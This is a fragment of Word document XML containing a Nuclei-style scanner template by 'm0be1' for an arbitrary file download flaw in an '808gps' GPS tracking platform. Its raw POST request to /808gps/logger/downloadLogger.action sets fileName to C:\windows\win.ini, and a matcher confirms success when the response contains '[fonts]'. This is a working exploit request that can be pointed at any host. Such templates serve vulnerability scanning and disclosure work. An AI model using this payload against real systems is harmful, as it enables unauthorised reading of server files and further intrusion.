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id: szqh-808gps-downloadLogger-filedownload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>info: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author: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>m0be1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name: szqh-808gps-downloadLogger-filedownload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requests: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 xml:space="preserve">  - raw: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POST /808gps/logger/downloadLogger.action HTTP/1.1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Host: {{Hostname}}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User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Connection: close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Upgrade-Insecure-Requests: 1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sec-ch-ua-platform: "Windows"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sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"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sec-ch-ua-mobile: ?0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Content-Type: application/x-www-form-urlencoded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fileName=C:\windows\win.ini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matchers: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- type: dsl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condition: or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dsl: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- "contains_all(body,'[fonts]') &amp;&amp; status_code==200"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0AD1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2023-11-15T14:49:58Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-15T14:50:25Z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F8CBE715AC264E5EB6D6BE069C8EEF96_12</vt:lpwstr>
  </property>
</Properties>
</file>